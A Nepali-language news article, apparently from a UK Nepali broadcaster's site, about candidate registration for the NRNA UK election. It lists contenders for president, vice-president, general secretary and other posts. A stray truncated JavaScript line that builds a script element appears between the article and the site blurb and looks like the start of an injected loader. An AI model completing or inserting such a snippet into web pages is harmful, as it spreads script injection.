एन आर एन ए को निवार्चन धमाधम, एनआरएन ए युकेका दर्जन वढि प्रत्यासी मध्ये ४ जना मात्रले अध्यक्षमा उम्मेदवारी दिए

admin Avatar
NRN

प्रवासी नेपालीहरुको साझा संगठन एन आर एन को आगामी अक्टोवरमा हुने विश्व सम्मेलन पुर्व नै राष्ट्रिय परिसदहरुले अधिवेसन सम्पन्न गरि सक्नुपर्ने भएकोले अहिले एन आर एन ए हरुले धमाधम निर्वाचन गरीरहेका छन। एन आर एन युकेको निवार्चन भने आउदो सेप्टेम्वर १३मा हुदैछ। प्रत्यक्ष निवार्चनका लागि दर्जन वढि व्याक्तिहरुले विभिन्न पदमा आफनो उम्मेद्धारी घोषणा गरेका थिए भने अस्ति सनिवार उम्मेद्धारीे दर्ताको दिनमा मात्र चार जनाले अध्यक्षको उम्मेद्धारी दर्ता गराएका छन। यसलाई हेर्ने हो भने सस्तो प्रचार वाजी र पद वाडफडकै लागि उम्मेद्धारी दिइएको हो भन्ने चर्चा चलेको छ।

अध्यक्षमा  मुछेत्र गुरुङ, हिराधन राई, विश्वास दिप तिगेला र योग कुमार फगामीेले मात्र उम्मेदावरी दर्ता गराए भने उम्मेदवारीको प्रचार प्रसारमा अग्रस्थानमा रहेका कल्पना आङवोहाङ, सुर्य नेम्वाङ, तस्विर लामा लगायतले उम्मेदवारी दर्ता गराएनन। अर्का प्रत्यासी वुघ्दिराम थापाले भने उपाध्यक्षमा उम्मेदवारी दर्ता गरएका छन। त्यसै गरि दुइ जना उपाध्यक्षको लागि दासु राम पाण्डे, सनत गुरुङ, ललित न्योपाने र अर्जुन कटुवाल लगायत ५ जना,एक महिला उपाध्यक्षको ठाउमा कुमारी गुरुङ र सान्ति थापा कुवार दुइ जना र एक महासचिव को ठाउमा विजय विक्रम लिङदेन र खुसि लिम्वु दुइ जनाको उम्मेदावारी दर्ता भएको निर्वाचन समितीले जनाएको छ। वाकी पदहरुमा भने सचिवमा कृष्ण तिवारी, कोषाध्यक्षमा दिपक श्रेष्ठ, महिला संयोजकमा सुसिला राइर्, युवा संयोजकमा हरी आचार्य र नौ सदस्यहरु निर्बिरोघ भएका छन। त्यस्तै गरि आइ सी सी सदस्यमा सुष्मा राई, कृष्ण तिमील्सिना, पशुपति भण्डारी र संगीता मरहठाको उम्मेदवारी परेको छ। यूकेले ४ आइसीसी सदस्य पाए उनीहरु निर्बिरोध हुनेछन भने ३ जना मात्रै पाए चुनाव गर्नुपर्नेछ।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories